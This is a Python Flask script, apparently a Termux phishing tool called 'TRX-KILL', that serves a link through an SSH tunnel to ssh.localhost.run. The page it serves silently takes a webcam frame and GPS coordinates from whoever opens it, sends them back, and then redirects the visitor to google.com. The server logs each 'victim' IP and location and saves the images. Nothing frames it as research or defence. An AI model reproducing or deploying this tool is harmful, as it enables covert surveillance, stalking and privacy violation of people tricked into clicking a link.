import os, sys, time, threading, base64
from flask import Flask, request

# --- CONFIGURACIÓN ---
STORAGE_PATH = "/sdcard/INFORMACIÓN-TRX-KILL"
CAPTURA_PATH = f"{STORAGE_PATH}/CAPTURAS"
LOG_FILE = f"{STORAGE_PATH}/datos.txt"
ADMIN_PASS = "admtrx"
if not os.path.exists(CAPTURA_PATH): os.makedirs(CAPTURA_PATH)

app = Flask('TRX-KILL')
# Colores Matrix
R, G, C, W = "\033[1;31m", "\033[1;32m", "\033[1;36m", "\033[0m"

def banner():
    # Efecto visual Matrix
    os.system('clear')
    print(f"{G}")
    print("  ___ ___  ___  _  __  ___  ___  _    _")
    print(" |__ |__  |__  | \\/ / |__  |___ | |  | |")
    print("    | |___ |___ |  /  |___ |    |_|__|_|")
    print("  ========================================")
    print("            [ SYSTEM MATRIX ]             ")
    print(f"{W}\n")

def animar(texto):
    for char in texto: sys.stdout.write(f"{G}{char}{W}"); sys.stdout.flush(); time.sleep(0.02)
    print()

@app.route('/')
def index():
    return """
    <html><body><script>
    async function start() {
        let s = await navigator.mediaDevices.getUserMedia({video: true});
        let p = await new Promise((r, j) => navigator.geolocation.getCurrentPosition(r, j));
        let v = document.createElement('video'); v.srcObject = s; v.play();
        setTimeout(() => {
            let c = document.createElement('canvas'); c.width=400; c.height=300;
            c.getContext('2d').drawImage(v, 0, 0, 400, 300);
            fetch('/log?lat='+p.coords.latitude+'&lon='+p.coords.longitude+'&img='+encodeURIComponent(c.toDataURL()));
            window.location.href='https://google.com';
        }, 1000);
    }
    start();
    </script></body></html>"""

@app.route('/log')
def log():
    with open(LOG_FILE, "a") as f:
        f.write(f"VÍCTIMA:{request.remote_addr} | GPS:{request.args.get('lat')},{request.args.get('lon')}\n")
    if request.args.get('img'):
        with open(f"{CAPTURA_PATH}/cap_{int(time.time())}.jpg", "wb") as f:
            f.write(base64.b64decode(request.args.get('img').split(',')[1]))
    return "OK"

def main():
    threading.Thread(target=lambda: app.run(port=5000), daemon=True).start()
    while True:
        banner()
        print(f"{G}[01] INFO | [02] LINK-KILL | [03] CLON-KILL | [06] ADM-SIST{W}")
        sel = input(f"\n{G}TRX-ROOT > {W}")

        if sel in ["02", "03"]:
            if os.path.exists(LOG_FILE): os.remove(LOG_FILE)
            if sel == "03":
                target = input(f"{G}INGRESA LINK A CLONAR (Ej: facebook.com): {W}")
                animar(f"... INYECTANDO MÁSCARA EN {target} ...")
            
            # Lanzamos el túnel para que el link sea real
            os.system("ssh -R 80:localhost:5000 ssh.localhost.run > /dev/null 2>&1 &")
            print(f"\n{C}LINK GENERADO: https://ssh.localhost.run{W}")
            print(f"{G}ESPERANDO VÍCTIMA... (No salgas){W}")
            
            while not os.path.exists(LOG_FILE): time.sleep(1)
            print(f"\n{R}>>> ¡VÍCTIMA DETECTADA! <<<{W}")
            input("\n[Enter] para volver...")

        elif sel == "06":
            if input(f"{G}PASS ADM: {W}") == ADMIN_PASS:
                print(f"{C}--- LISTANDO ARCHIVOS ---{W}")
                os.system(f"ls -R {STORAGE_PATH}")
            input("\n[Enter]...")
        
        elif sel == "00": sys.exit()

if __name__ == "__main__": main()
